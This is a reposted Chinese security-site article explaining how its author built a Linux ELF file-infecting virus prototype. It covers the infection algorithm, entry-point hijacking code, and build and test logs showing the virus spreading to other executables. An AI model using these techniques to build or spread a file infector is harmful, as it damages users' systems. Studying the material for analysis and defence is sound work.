歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

剖析Linux病毒原型工作過程和關鍵環節

來源:轉載 作者:佚名 時間:2010-02-26 TAG: 我要投稿
一、 介紹 

  寫這篇文章的目的主要是對最近寫的一個Linux病毒原型代碼做一個總結,同時向對這方面有興趣的朋友做一個簡單的介紹。閱讀這篇文章你需要一些知識,要對ELF有所了解、能夠閱讀一些嵌入了匯編的C代碼、了解病毒的基本工作原理。 

  二、 ELF Infector (ELF文件感染器) 

  為了制作病毒文件,我們需要一個ELF文件感染器,用于制造第一個帶毒文件。對于ELF文件感染技術,在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》一文中已經有了一個非常好的分析、描述,在這方面我還沒有發現可以對其進行補充的地方,因此在這里我把Silvio Cesare對ELF Infection過程的總結貼出來,以供參考:   

        以下是代碼片段: 
The final algorithm is using this information is. 

  * Increase p_shoff by PAGE_SIZE in the ELF header 

  * Patch the insertion code (parasite) to jump to the entry point 

  (original) 

  * Locate the text segment program header 

  * Modify the entry point of the ELF header to point to the new 

  code (p_vaddr + p_filesz) 

  * Increase p_filesz by account for the new code (parasite) 

  * Increase p_memsz to account for the new code (parasite) 

  * For each phdr who’s segment is after the insertion (text segment) 

  * increase p_offset by PAGE_SIZE 

  * For the last shdr in the text segment 

  * increase sh_len by the parasite length 

  * For each shdr who’s section resides after the insertion 

  * Increase sh_offset by PAGE_SIZE 

  * Physically insert the new code (parasite) and pad to PAGE_SIZE, into 

  the file - text segment p_offset + p_filesz (original) 

  在Linux病毒原型中所使用的gei - ELF Infector即是根據這個原理寫的。在附錄中你可以看到這個感染工具的源代碼: g-elf-infector.cg-elf-infector與病毒是獨立開的,其只在制作第一個病毒文件時被使用。我簡單介紹一下它的使用方法,g-elf-infector.c可以被用于任何希望--將二進制代碼插入到指定文件的文本段,并在目標文件執行時首先被執行--的用途上。g-elf-infector.c的接口很簡單,你只需要提供以下三個定義: 

  * 存放你的二進制代碼返回地址的地址,這里需要的是這個地址與代碼起始地址的偏移,用于返回到目標程序的正常入口  
        以下是代碼片段: 
#define PARACODE_RETADDR_ADDR_OFFSET 1232 

  * 要插入的二進制代碼(由于用C編寫,所以這里需要以一個函數的方式提供) 

  void parasite_code(void); 

  * 二進制代碼的結束(為了易用,這里用一個結尾函數來進行代碼長度計算) void parasite_code_end(void); 

  parasite_code_end應該是parasite_code函數后的第一個函數定義,通常應該如下表示 void parasite_code(void) 

  { 

  ... 

  ... 

  ... 

  } 

  void parasite_code_end(void) {} 

  在這里存在一個問題,就是編譯有可能在編譯時將parasite_code_end放在parasite_code地址的前面,這樣會導致計算代碼長度時失敗,為了避免這個問題,你可以這樣做 void parasite_code(void) 

  { 

  ... 

  ... 

  ... 

  } 

  void parasite_code_end(void) {parasite_code();} 

  有了這三個定義,g-elf-infector就能正確編譯,編譯后即可用來ELF文件感染 face=Verdana 
三、病毒原型的工作過程 

  1 首先通過ELF Infector將病毒代碼感染到一個ELF文件,這樣就創造了第一個帶毒文件,后續的傳播就由它來完成。 

  2 當帶毒文件被執行時,會首先跳到病毒代碼開始執行。 

  3 病毒代碼開始發作,在這個原型里,病毒會直接開始傳播。 

  4 病毒遍歷當前目錄下的每一個文件,如果是符合條件的ELF文件就開始感染。  


  5 病毒的感染過程和ELF Infector的過程類似,但由于工作環境的不同,代碼的實現也是有較大區別的。 

  6 目前傳染對ELF文件的基本要求是文本段要有剩余空間能夠容納病毒代碼,如果無法滿足,病毒會忽略此ELF。對于被感染過一次的ELF文件,文本段將不會有剩余的空間,因此二次感染是不會發生的。 

  7 病毒代碼執行過后,會恢復堆棧和所有寄存器(這很重要),然后跳回到真正的可執行文件入口,開始正常的運行過程。 

  上面對病毒原型的工作過程的介紹也許顯得千篇一律了,和我們早就熟知的關于病毒的一些介紹沒有什么區別?是的,的確是這樣,原理都是類似的,關鍵是要看實現。下面我們就將通過對一些技術問題的分析來了解具體的實現思路。 

四、關鍵技術問題及處理  
  1 ELF文件執行流程重定向和代碼插入 

  在ELF文件感染的問題上,ELF Infector與病毒傳播時調用的infect_virus思路是一樣的: 

  * 定位到文本段,將病毒的代碼接到文本段的尾部。這個過程的關鍵是要熟悉ELF文件的格式,將病毒代碼復制到文本段尾部后,能夠根據需要調整文本段長度改變所影響到的后續段(segment)或節(section)的虛擬地址。同時注意把新引入的文本段部分與一個.setion建立關聯,防止strip這樣的工具將插入的代碼去除。還有一點就是要注意文本段增加長度的對齊問題,見ELF文檔中的描述:   

        以下是代碼片段: 
p_align 

  As ``Program Loading’’ later in this part describes, loadable 

  process segments must have congruent values for p_vaddr and 

  p_offset, modulo the page size. 

  * 通過過將ELF文件頭中的入口地址修改為病毒代碼地址來完成代碼重定向: 

  org_entry = ehdr->e_entry; 

  ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; 

  2 病毒代碼如何返回到真正的ELF文件入口 

  方法技巧應該很多,這里采用的方法是PUSH+RET組合: __asm__ volatile ( 

  ... 

  "return:/n/t" 

  "push $0xAABBCCDD/n/t" 

  "ret/n" 

  ::); 

  其中0xAABBCCDD處存放的是真正的程序入口地址,這個值在插入病毒代碼時由感染程序來填寫。 

五、 新編譯環境下的調試方法  
        以下是代碼片段: 

  g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c 

  Makefile parasite-sample.c parasite-sample.h  


  調整Makefile文件,將編譯模式改為調試模式,即關掉-DNDEBUG選項 [email protected]:~/tmp/virus> cat Makefile 

  all: foo gei 

  gei: g-elf-infector.c gvirus.o 

  gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG 

  fo foo.c 

  gcc $< -o foo 

  gvirus. gvirus.c 

  gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG 

  clean: 

  rm *.o -rf 

  rm foo -rf 

  rm gei -rf 

  編譯代碼 [email protected]:~/tmp/virus> make 

  gcc foo.c -o foo 

  gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG 

  gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG 

        [email protected]:~/tmp/virus> ls 

  先獲取病毒代碼長度,然后調整gvirus.c中的#define PARACODE_LENGTH定義 

  [email protected]:~/tmp/virus>. /gei -l <.這里獲取病毒代碼的長度 

  Parasite code length: 1744 

  獲取病毒代碼開始位置和0xaabbccdd的地址,計算存放返回地址的地址的偏移 
以下是代碼片段: 
[email protected]:~/tmp/virus> objdump -d gei grep aabbccdd 

  8049427: 68 dd cc bb aa push $0xaabbccdd 

  [email protected]:~/tmp/virus> objdump -d gei grep "" 

  08048d80 : 

  8049450: e9 2b f9 ff ff jmp 8048d80 

  [email protected]:~/tmp/virus> objdump -d gei grep ":" 

  08048d80 : 

  0x8049427與0x8048d80相減即獲得我們需要的偏移,用這個值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值 

  重新編譯 [email protected]:~/tmp/virus> make clean 

  rm *.o -rf 

  rm foo -rf 

  rm gei -rf 

  [email protected]:~/tmp/virus> make 

  gcc foo.c -o foo 

  gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG 

  gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG 

  [email protected]:~/tmp/virus> ls 

  gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c 

  g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h 

  建立一個測試目錄,測試一下 [email protected]:~/tmp/virus> mkdir test 

  [email protected]:~/tmp/virus> cp gei foo test 

  [email protected]:~/tmp/virus> cd test 

  [email protected]:~/tmp/virus/test> ls 

  gei foo 

  [email protected]:~/tmp/virus/test> cp foo h 

  制作帶毒程序 [email protected]:~/tmp/virus/test>. /gei h 

  file size: 8668 

  e_phoff: 00000034 

  e_shoff: 00001134 

  e_phentsize: 00000020 

  e_phnum: 00000008 

  e_shentsize: 00000028 

  e_shnum: 00000025 

  text segment file offset: 0 

  [15 sections patched] 

  [email protected]:~/tmp/virus/test> ll 

  total 44 

  -rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei 

  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h 

  -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo 

  運行帶毒程序 [email protected]:~/tmp/virus/test>. /h 

  . 

  .. 

  gei 

  foo 

  h 

  .backup.h 

  real elf point 

  [email protected]:~/tmp/virus/test> ll 

  total 52 

  -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei 

  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h 

  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo 

  測試上面帶毒程序運行后,是否感染了其他ELF程序 [email protected]:~/tmp/virus/test>. /foo 

  . 

  .. 

  gei 

  Better luck next file 

  foo 

  h 

  Better luck next file 

  .backup.h 

  Better luck next file 

  real elf point 

  OK,成功 [email protected]:~/tmp/virus/test> cp. ./foo hh 

  [email protected]:~/tmp/virus/test> ll 

  total 64 

  -rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei 

  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h 

  -rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh 

  -rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo 

  [email protected]:~/tmp/virus/test>. /foo 

  . 

  .. 

  gei 

  Better luck next file 

  foo 

  h 

  Better luck next file 

  .backup.h 

  Better luck next file 

  hh 

  real elf point 

  [email protected]:~/tmp/virus/test> 


  六、總結 

  由于我既不是一個virus coder也不是一個anti-viruscoder,所以對病毒技術的掌握應該是有欠缺的。如果在文章中對病毒技術的描述不夠準確,分析不夠到位,還請指正,謝謝 
【聲明】:黑吧安全網(http://www.pcpbjo.tw)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        云南快乐十分前三电视